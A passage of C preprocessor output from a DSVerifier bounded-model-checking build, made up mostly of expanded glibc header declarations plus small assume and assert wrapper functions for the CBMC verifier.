__size[40]; long int __align; } pthread_mutex_t; typedef union { struct __pthread_cond_s __data; char __size[48]; __extension__ long long int __align; } pthread_cond_t; typedef union { struct __pthread_rwlock_arch_t __data; char __size[56]; long int __align; } pthread_rwlock_t; typedef union { char __size[8]; long int __align; } pthread_rwlockattr_t; typedef volatile int pthread_spinlock_t; typedef union { char __size[32]; long int __align; } pthread_barrier_t; typedef union { char __size[4]; int __align; } pthread_barrierattr_t; # 228 "/usr/include/x86_64-linux-gnu/sys/types.h" 2 3 4 # 395 "/usr/include/stdlib.h" 2 3 4 extern long int random (void) __attribute__ ((__nothrow__ , __leaf__)); extern void srandom (unsigned int __seed) __attribute__ ((__nothrow__ , __leaf__)); extern char *initstate (unsigned int __seed, char *__statebuf, size_t __statelen) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (2))); extern char *setstate (char *__statebuf) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1))); struct random_data { int32_t *fptr; int32_t *rptr; int32_t *state; int rand_type; int rand_deg; int rand_sep; int32_t *end_ptr; }; extern int random_r (struct random_data *__restrict __buf, int32_t *__restrict __result) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2))); extern int srandom_r (unsigned int __seed, struct random_data *__buf) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (2))); extern int initstate_r (unsigned int __seed, char *__restrict __statebuf, size_t __statelen, struct random_data *__restrict __buf) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (2, 4))); extern int setstate_r (char *__restrict __statebuf, struct random_data *__restrict __buf) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2))); extern int rand (void) __attribute__ ((__nothrow__ , __leaf__)); extern void srand (unsigned int __seed) __attribute__ ((__nothrow__ , __leaf__)); extern int rand_r (unsigned int *__seed) __attribute__ ((__nothrow__ , __leaf__)); extern double drand48 (void) __attribute__ ((__nothrow__ , __leaf__)); extern double erand48 (unsigned short int __xsubi[3]) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1))); extern long int lrand48 (void) __attribute__ ((__nothrow__ , __leaf__)); extern long int nrand48 (unsigned short int __xsubi[3]) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1))); extern long int mrand48 (void) __attribute__ ((__nothrow__ , __leaf__)); extern long int jrand48 (unsigned short int __xsubi[3]) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1))); extern void srand48 (long int __seedval) __attribute__ ((__nothrow__ , __leaf__)); extern unsigned short int *seed48 (unsigned short int __seed16v[3]) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1))); extern void lcong48 (unsigned short int __param[7]) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1))); struct drand48_data { unsigned short int __x[3]; unsigned short int __old_x[3]; unsigned short int __c; unsigned short int __init; __extension__ unsigned long long int __a; }; extern int drand48_r (struct drand48_data *__restrict __buffer, double *__restrict __result) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2))); extern int erand48_r (unsigned short int __xsubi[3], struct drand48_data *__restrict __buffer, double *__restrict __result) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2))); extern int lrand48_r (struct drand48_data *__restrict __buffer, long int *__restrict __result) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2))); extern int nrand48_r (unsigned short int __xsubi[3], struct drand48_data *__restrict __buffer, long int *__restrict __result) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2))); extern int mrand48_r (struct drand48_data *__restrict __buffer, long int *__restrict __result) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2))); extern int jrand48_r (unsigned short int __xsubi[3], struct drand48_data *__restrict __buffer, long int *__restrict __result) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2))); extern int srand48_r (long int __seedval, struct drand48_data *__buffer) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (2))); extern int seed48_r (unsigned short int __seed16v[3], struct drand48_data *__buffer) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2))); extern int lcong48_r (unsigned short int __param[7], struct drand48_data *__buffer) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2))); extern void *malloc (size_t __size) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__malloc__)) __attribute__ ((__alloc_size__ (1))) ; extern void *calloc (size_t __nmemb, size_t __size) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__malloc__)) __attribute__ ((__alloc_size__ (1, 2))) ; extern void *realloc (void *__ptr, size_t __size) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__warn_unused_result__)) __attribute__ ((__alloc_size__ (2))); extern void *reallocarray (void *__ptr, size_t __nmemb, size_t __size) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__warn_unused_result__)) __attribute__ ((__alloc_size__ (2, 3))); extern void free (void *__ptr) __attribute__ ((__nothrow__ , __leaf__)); # 1 "/usr/include/alloca.h" 1 3 4 # 24 "/usr/include/alloca.h" 3 4 # 1 "/usr/lib/gcc/x86_64-linux-gnu/9/include/stddef.h" 1 3 4 # 25 "/usr/include/alloca.h" 2 3 4 extern void *alloca (size_t __size) __attribute__ ((__nothrow__ , __leaf__)); # 569 "/usr/include/stdlib.h" 2 3 4 extern void *valloc (size_t __size) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__malloc__)) __attribute__ ((__alloc_size__ (1))) ; extern int posix_memalign (void **__memptr, size_t __alignment, size_t __size) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1))) ; extern void *aligned_alloc (size_t __alignment, size_t __size) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__malloc__)) __attribute__ ((__alloc_size__ (2))) ; extern void abort (void) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__noreturn__)); extern int atexit (void (*__func) (void)) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1))); extern int at_quick_exit (void (*__func) (void)) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1))); extern int on_exit (void (*__func) (int __status, void *__arg), void *__arg) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1))); extern void exit (int __status) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__noreturn__)); extern void quick_exit (int __status) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__noreturn__)); extern void _Exit (int __status) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__noreturn__)); extern char *getenv (const char *__name) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1))) ; # 647 "/usr/include/stdlib.h" 3 4 extern int putenv (char *__string) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1))); extern int setenv (const char *__name, const char *__value, int __replace) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (2))); extern int unsetenv (const char *__name) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1))); extern int clearenv (void) __attribute__ ((__nothrow__ , __leaf__)); # 675 "/usr/include/stdlib.h" 3 4 extern char *mktemp (char *__template) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1))); # 688 "/usr/include/stdlib.h" 3 4 extern int mkstemp (char *__template) __attribute__ ((__nonnull__ (1))) ; # 710 "/usr/include/stdlib.h" 3 4 extern int mkstemps (char *__template, int __suffixlen) __attribute__ ((__nonnull__ (1))) ; # 731 "/usr/include/stdlib.h" 3 4 extern char *mkdtemp (char *__template) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1))) ; # 784 "/usr/include/stdlib.h" 3 4 extern int system (const char *__command) ; # 800 "/usr/include/stdlib.h" 3 4 extern char *realpath (const char *__restrict __name, char *__restrict __resolved) __attribute__ ((__nothrow__ , __leaf__)) ; typedef int (*__compar_fn_t) (const void *, const void *); # 820 "/usr/include/stdlib.h" 3 4 extern void *bsearch (const void *__key, const void *__base, size_t __nmemb, size_t __size, __compar_fn_t __compar) __attribute__ ((__nonnull__ (1, 2, 5))) ; extern void qsort (void *__base, size_t __nmemb, size_t __size, __compar_fn_t __compar) __attribute__ ((__nonnull__ (1, 4))); # 840 "/usr/include/stdlib.h" 3 4 extern int abs (int __x) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__const__)) ; extern long int labs (long int __x) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__const__)) ; __extension__ extern long long int llabs (long long int __x) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__const__)) ; extern div_t div (int __numer, int __denom) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__const__)) ; extern ldiv_t ldiv (long int __numer, long int __denom) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__const__)) ; __extension__ extern lldiv_t lldiv (long long int __numer, long long int __denom) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__const__)) ; # 872 "/usr/include/stdlib.h" 3 4 extern char *ecvt (double __value, int __ndigit, int *__restrict __decpt, int *__restrict __sign) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3, 4))) ; extern char *fcvt (double __value, int __ndigit, int *__restrict __decpt, int *__restrict __sign) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3, 4))) ; extern char *gcvt (double __value, int __ndigit, char *__buf) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3))) ; extern char *qecvt (long double __value, int __ndigit, int *__restrict __decpt, int *__restrict __sign) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3, 4))) ; extern char *qfcvt (long double __value, int __ndigit, int *__restrict __decpt, int *__restrict __sign) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3, 4))) ; extern char *qgcvt (long double __value, int __ndigit, char *__buf) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3))) ; extern int ecvt_r (double __value, int __ndigit, int *__restrict __decpt, int *__restrict __sign, char *__restrict __buf, size_t __len) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3, 4, 5))); extern int fcvt_r (double __value, int __ndigit, int *__restrict __decpt, int *__restrict __sign, char *__restrict __buf, size_t __len) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3, 4, 5))); extern int qecvt_r (long double __value, int __ndigit, int *__restrict __decpt, int *__restrict __sign, char *__restrict __buf, size_t __len) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3, 4, 5))); extern int qfcvt_r (long double __value, int __ndigit, int *__restrict __decpt, int *__restrict __sign, char *__restrict __buf, size_t __len) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3, 4, 5))); extern int mblen (const char *__s, size_t __n) __attribute__ ((__nothrow__ , __leaf__)); extern int mbtowc (wchar_t *__restrict __pwc, const char *__restrict __s, size_t __n) __attribute__ ((__nothrow__ , __leaf__)); extern int wctomb (char *__s, wchar_t __wchar) __attribute__ ((__nothrow__ , __leaf__)); extern size_t mbstowcs (wchar_t *__restrict __pwcs, const char *__restrict __s, size_t __n) __attribute__ ((__nothrow__ , __leaf__)); extern size_t wcstombs (char *__restrict __s, const wchar_t *__restrict __pwcs, size_t __n) __attribute__ ((__nothrow__ , __leaf__)); extern int rpmatch (const char *__response) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1))) ; # 957 "/usr/include/stdlib.h" 3 4 extern int getsubopt (char **__restrict __optionp, char *const *__restrict __tokens, char **__restrict __valuep) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2, 3))) ; # 1003 "/usr/include/stdlib.h" 3 4 extern int getloadavg (double __loadavg[], int __nelem) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1))); # 1013 "/usr/include/stdlib.h" 3 4 # 1 "/usr/include/x86_64-linux-gnu/bits/stdlib-float.h" 1 3 4 # 1014 "/usr/include/stdlib.h" 2 3 4 # 1023 "/usr/include/stdlib.h" 3 4 # 18 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" 2 # 1 "/usr/include/assert.h" 1 3 4 # 66 "/usr/include/assert.h" 3 4 extern void __assert_fail (const char *__assertion, const char *__file, unsigned int __line, const char *__function) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__noreturn__)); extern void __assert_perror_fail (int __errnum, const char *__file, unsigned int __line, const char *__function) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__noreturn__)); extern void __assert (const char *__assertion, const char *__file, int __line) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__noreturn__)); # 19 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" 2 # 1 "/usr/include/stdio.h" 1 3 4 # 27 "/usr/include/stdio.h" 3 4 # 1 "/usr/include/x86_64-linux-gnu/bits/libc-header-start.h" 1 3 4 # 28 "/usr/include/stdio.h" 2 3 4 # 1 "/usr/lib/gcc/x86_64-linux-gnu/9/include/stddef.h" 1 3 4 # 34 "/usr/include/stdio.h" 2 3 4 # 1 "/usr/lib/gcc/x86_64-linux-gnu/9/include/stdarg.h" 1 3 4 # 40 "/usr/lib/gcc/x86_64-linux-gnu/9/include/stdarg.h" 3 4 typedef __builtin_va_list __gnuc_va_list; # 37 "/usr/include/stdio.h" 2 3 4 # 1 "/usr/include/x86_64-linux-gnu/bits/types/__fpos_t.h" 1 3 4 # 1 "/usr/include/x86_64-linux-gnu/bits/types/__mbstate_t.h" 1 3 4 # 13 "/usr/include/x86_64-linux-gnu/bits/types/__mbstate_t.h" 3 4 typedef struct { int __count; union { unsigned int __wch; char __wchb[4]; } __value; } __mbstate_t; # 6 "/usr/include/x86_64-linux-gnu/bits/types/__fpos_t.h" 2 3 4 typedef struct _G_fpos_t { __off_t __pos; __mbstate_t __state; } __fpos_t; # 40 "/usr/include/stdio.h" 2 3 4 # 1 "/usr/include/x86_64-linux-gnu/bits/types/__fpos64_t.h" 1 3 4 # 10 "/usr/include/x86_64-linux-gnu/bits/types/__fpos64_t.h" 3 4 typedef struct _G_fpos64_t { __off64_t __pos; __mbstate_t __state; } __fpos64_t; # 41 "/usr/include/stdio.h" 2 3 4 # 1 "/usr/include/x86_64-linux-gnu/bits/types/__FILE.h" 1 3 4 struct _IO_FILE; typedef struct _IO_FILE __FILE; # 42 "/usr/include/stdio.h" 2 3 4 # 1 "/usr/include/x86_64-linux-gnu/bits/types/FILE.h" 1 3 4 struct _IO_FILE; typedef struct _IO_FILE FILE; # 43 "/usr/include/stdio.h" 2 3 4 # 1 "/usr/include/x86_64-linux-gnu/bits/types/struct_FILE.h" 1 3 4 # 35 "/usr/include/x86_64-linux-gnu/bits/types/struct_FILE.h" 3 4 struct _IO_FILE; struct _IO_marker; struct _IO_codecvt; struct _IO_wide_data; typedef void _IO_lock_t; struct _IO_FILE { int _flags; char *_IO_read_ptr; char *_IO_read_end; char *_IO_read_base; char *_IO_write_base; char *_IO_write_ptr; char *_IO_write_end; char *_IO_buf_base; char *_IO_buf_end; char *_IO_save_base; char *_IO_backup_base; char *_IO_save_end; struct _IO_marker *_markers; struct _IO_FILE *_chain; int _fileno; int _flags2; __off_t _old_offset; unsigned short _cur_column; signed char _vtable_offset; char _shortbuf[1]; _IO_lock_t *_lock; __off64_t _offset; struct _IO_codecvt *_codecvt; struct _IO_wide_data *_wide_data; struct _IO_FILE *_freeres_list; void *_freeres_buf; size_t __pad5; int _mode; char _unused2[15 * sizeof (int) - 4 * sizeof (void *) - sizeof (size_t)]; }; # 44 "/usr/include/stdio.h" 2 3 4 # 52 "/usr/include/stdio.h" 3 4 typedef __gnuc_va_list va_list; # 84 "/usr/include/stdio.h" 3 4 typedef __fpos_t fpos_t; # 133 "/usr/include/stdio.h" 3 4 # 1 "/usr/include/x86_64-linux-gnu/bits/stdio_lim.h" 1 3 4 # 134 "/usr/include/stdio.h" 2 3 4 extern FILE *stdin; extern FILE *stdout; extern FILE *stderr; extern int remove (const char *__filename) __attribute__ ((__nothrow__ , __leaf__)); extern int rename (const char *__old, const char *__new) __attribute__ ((__nothrow__ , __leaf__)); extern int renameat (int __oldfd, const char *__old, int __newfd, const char *__new) __attribute__ ((__nothrow__ , __leaf__)); # 173 "/usr/include/stdio.h" 3 4 extern FILE *tmpfile (void) ; # 187 "/usr/include/stdio.h" 3 4 extern char *tmpnam (char *__s) __attribute__ ((__nothrow__ , __leaf__)) ; extern char *tmpnam_r (char *__s) __attribute__ ((__nothrow__ , __leaf__)) ; # 204 "/usr/include/stdio.h" 3 4 extern char *tempnam (const char *__dir, const char *__pfx) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__malloc__)) ; extern int fclose (FILE *__stream); extern int fflush (FILE *__stream); # 227 "/usr/include/stdio.h" 3 4 extern int fflush_unlocked (FILE *__stream); # 246 "/usr/include/stdio.h" 3 4 extern FILE *fopen (const char *__restrict __filename, const char *__restrict __modes) ; extern FILE *freopen (const char *__restrict __filename, const char *__restrict __modes, FILE *__restrict __stream) ; # 279 "/usr/include/stdio.h" 3 4 extern FILE *fdopen (int __fd, const char *__modes) __attribute__ ((__nothrow__ , __leaf__)) ; # 292 "/usr/include/stdio.h" 3 4 extern FILE *fmemopen (void *__s, size_t __len, const char *__modes) __attribute__ ((__nothrow__ , __leaf__)) ; extern FILE *open_memstream (char **__bufloc, size_t *__sizeloc) __attribute__ ((__nothrow__ , __leaf__)) ; extern void setbuf (FILE *__restrict __stream, char *__restrict __buf) __attribute__ ((__nothrow__ , __leaf__)); extern int setvbuf (FILE *__restrict __stream, char *__restrict __buf, int __modes, size_t __n) __attribute__ ((__nothrow__ , __leaf__)); extern void setbuffer (FILE *__restrict __stream, char *__restrict __buf, size_t __size) __attribute__ ((__nothrow__ , __leaf__)); extern void setlinebuf (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__)); extern int fprintf (FILE *__restrict __stream, const char *__restrict __format, ...); extern int printf (const char *__restrict __format, ...); extern int sprintf (char *__restrict __s, const char *__restrict __format, ...) __attribute__ ((__nothrow__)); extern int vfprintf (FILE *__restrict __s, const char *__restrict __format, __gnuc_va_list __arg); extern int vprintf (const char *__restrict __format, __gnuc_va_list __arg); extern int vsprintf (char *__restrict __s, const char *__restrict __format, __gnuc_va_list __arg) __attribute__ ((__nothrow__)); extern int snprintf (char *__restrict __s, size_t __maxlen, const char *__restrict __format, ...) __attribute__ ((__nothrow__)) __attribute__ ((__format__ (__printf__, 3, 4))); extern int vsnprintf (char *__restrict __s, size_t __maxlen, const char *__restrict __format, __gnuc_va_list __arg) __attribute__ ((__nothrow__)) __attribute__ ((__format__ (__printf__, 3, 0))); # 379 "/usr/include/stdio.h" 3 4 extern int vdprintf (int __fd, const char *__restrict __fmt, __gnuc_va_list __arg) __attribute__ ((__format__ (__printf__, 2, 0))); extern int dprintf (int __fd, const char *__restrict __fmt, ...) __attribute__ ((__format__ (__printf__, 2, 3))); extern int fscanf (FILE *__restrict __stream, const char *__restrict __format, ...) ; extern int scanf (const char *__restrict __format, ...) ; extern int sscanf (const char *__restrict __s, const char *__restrict __format, ...) __attribute__ ((__nothrow__ , __leaf__)); extern int fscanf (FILE *__restrict __stream, const char *__restrict __format, ...) __asm__ ("" "__isoc99_fscanf") ; extern int scanf (const char *__restrict __format, ...) __asm__ ("" "__isoc99_scanf") ; extern int sscanf (const char *__restrict __s, const char *__restrict __format, ...) __asm__ ("" "__isoc99_sscanf") __attribute__ ((__nothrow__ , __leaf__)) ; # 432 "/usr/include/stdio.h" 3 4 extern int vfscanf (FILE *__restrict __s, const char *__restrict __format, __gnuc_va_list __arg) __attribute__ ((__format__ (__scanf__, 2, 0))) ; extern int vscanf (const char *__restrict __format, __gnuc_va_list __arg) __attribute__ ((__format__ (__scanf__, 1, 0))) ; extern int vsscanf (const char *__restrict __s, const char *__restrict __format, __gnuc_va_list __arg) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__format__ (__scanf__, 2, 0))); extern int vfscanf (FILE *__restrict __s, const char *__restrict __format, __gnuc_va_list __arg) __asm__ ("" "__isoc99_vfscanf") __attribute__ ((__format__ (__scanf__, 2, 0))) ; extern int vscanf (const char *__restrict __format, __gnuc_va_list __arg) __asm__ ("" "__isoc99_vscanf") __attribute__ ((__format__ (__scanf__, 1, 0))) ; extern int vsscanf (const char *__restrict __s, const char *__restrict __format, __gnuc_va_list __arg) __asm__ ("" "__isoc99_vsscanf") __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__format__ (__scanf__, 2, 0))); # 485 "/usr/include/stdio.h" 3 4 extern int fgetc (FILE *__stream); extern int getc (FILE *__stream); extern int getchar (void); extern int getc_unlocked (FILE *__stream); extern int getchar_unlocked (void); # 510 "/usr/include/stdio.h" 3 4 extern int fgetc_unlocked (FILE *__stream); # 521 "/usr/include/stdio.h" 3 4 extern int fputc (int __c, FILE *__stream); extern int putc (int __c, FILE *__stream); extern int putchar (int __c); # 537 "/usr/include/stdio.h" 3 4 extern int fputc_unlocked (int __c, FILE *__stream); extern int putc_unlocked (int __c, FILE *__stream); extern int putchar_unlocked (int __c); extern int getw (FILE *__stream); extern int putw (int __w, FILE *__stream); extern char *fgets (char *__restrict __s, int __n, FILE *__restrict __stream) ; # 603 "/usr/include/stdio.h" 3 4 extern __ssize_t __getdelim (char **__restrict __lineptr, size_t *__restrict __n, int __delimiter, FILE *__restrict __stream) ; extern __ssize_t getdelim (char **__restrict __lineptr, size_t *__restrict __n, int __delimiter, FILE *__restrict __stream) ; extern __ssize_t getline (char **__restrict __lineptr, size_t *__restrict __n, FILE *__restrict __stream) ; extern int fputs (const char *__restrict __s, FILE *__restrict __stream); extern int puts (const char *__s); extern int ungetc (int __c, FILE *__stream); extern size_t fread (void *__restrict __ptr, size_t __size, size_t __n, FILE *__restrict __stream) ; extern size_t fwrite (const void *__restrict __ptr, size_t __size, size_t __n, FILE *__restrict __s); # 673 "/usr/include/stdio.h" 3 4 extern size_t fread_unlocked (void *__restrict __ptr, size_t __size, size_t __n, FILE *__restrict __stream) ; extern size_t fwrite_unlocked (const void *__restrict __ptr, size_t __size, size_t __n, FILE *__restrict __stream); extern int fseek (FILE *__stream, long int __off, int __whence); extern long int ftell (FILE *__stream) ; extern void rewind (FILE *__stream); # 707 "/usr/include/stdio.h" 3 4 extern int fseeko (FILE *__stream, __off_t __off, int __whence); extern __off_t ftello (FILE *__stream) ; # 731 "/usr/include/stdio.h" 3 4 extern int fgetpos (FILE *__restrict __stream, fpos_t *__restrict __pos); extern int fsetpos (FILE *__stream, const fpos_t *__pos); # 757 "/usr/include/stdio.h" 3 4 extern void clearerr (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__)); extern int feof (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__)) ; extern int ferror (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__)) ; extern void clearerr_unlocked (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__)); extern int feof_unlocked (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__)) ; extern int ferror_unlocked (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__)) ; extern void perror (const char *__s); # 1 "/usr/include/x86_64-linux-gnu/bits/sys_errlist.h" 1 3 4 # 26 "/usr/include/x86_64-linux-gnu/bits/sys_errlist.h" 3 4 extern int sys_nerr; extern const char *const sys_errlist[]; # 782 "/usr/include/stdio.h" 2 3 4 extern int fileno (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__)) ; extern int fileno_unlocked (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__)) ; # 800 "/usr/include/stdio.h" 3 4 extern FILE *popen (const char *__command, const char *__modes) ; extern int pclose (FILE *__stream); extern char *ctermid (char *__s) __attribute__ ((__nothrow__ , __leaf__)); # 840 "/usr/include/stdio.h" 3 4 extern void flockfile (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__)); extern int ftrylockfile (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__)) ; extern void funlockfile (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__)); # 858 "/usr/include/stdio.h" 3 4 extern int __uflow (FILE *); extern int __overflow (FILE *, int); # 873 "/usr/include/stdio.h" 3 4 # 20 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" 2 # 21 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" void __DSVERIFIER_assume(_Bool expression){ __CPROVER_assume(expression); } void __DSVERIFIER_assert(_Bool expression){ # 36 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" 3 4 ((void) sizeof (( # 36 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" expression # 36 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" 3 4 ) ? 1 : 0), __extension__ ({ if ( # 36 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" expression # 36 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" 3 4 ) ; else __assert_fail ( # 36 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" "expression" # 36 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" 3 4 , "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h", 36, __extension__ __PRETTY_FUNCTION__); })) # 36 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" ; } void __DSVERIFIER_assert_msg(_Bool expression, char * msg){ printf("%s", msg); # 41 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" 3 4 ((void) sizeof (( # 41 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" expression # 41 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" 3 4 ) ? 1 : 0), __extension__ ({ if ( # 41 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" expression # 41 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" 3 4 ) ; else __assert_fail ( # 41 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" "expression" # 41 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" 3 4 , "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h", 41, __extension__ __PRETTY_FUNCTION__); })) # 41 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" ; } # 22 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2 # 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/fixed-point.h" 1 # 27 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/fixed-point.h" # 1 "/usr/lib/gcc/x86_64-linux-gnu/9/include/stdint.h" 1 3 4 # 9 "/usr/lib/gcc/x86_64-linux-gnu/9/include/stdint.h" 3 4 # 1 "/usr/include/stdint.h" 1 3 4 # 26 "/usr/include/stdint.h" 3 4 # 1 "/usr/include/x86_64-linux-gnu/bits/libc-header-start.h" 1 3 4 # 27 "/usr/include/stdint.h" 2 3 4 # 1 "/usr/include/x86_64-linux-gnu/bits/wchar.h" 1 3 4 # 29 "/usr/include/stdint.h" 2 3 4 # 1 "/usr/include/x86_64-linux-gnu/bits/wordsize.h" 1 3 4 # 30 "/usr/include/stdint.h" 2 3 4 # 1 "/usr/include/x86_64-linux-gnu/bits/stdint-uintn.h" 1 3 4 # 24 "/usr/include/x86_64-linux-gnu/bits/stdint-uintn.h" 3 4 # 24 "/usr/include/x86_64-linux-gnu/bits/stdint-uintn.h" 3 4 typedef __uint8_t uint8_t; typedef __uint16_t uint16_t; typedef __uint32_t uint32_t; typedef __uint64_t uint64_t; # 38 "/usr/include/stdint.h" 2 3 4 typedef __int_least8_t int_least8_t; typedef __int_least16_t int_least16_t; typedef __int_least32_t int_least32_t; typedef __int_least64_t int_least64_t; typedef __uint_least8_t uint_least8_t; typedef __uint_least16_t uint_least16_t; typedef __uint_least32_t uint_least32_t; typedef __uint_least64_t uint_least64_t; typedef signed char int_fast8_t; typedef long int 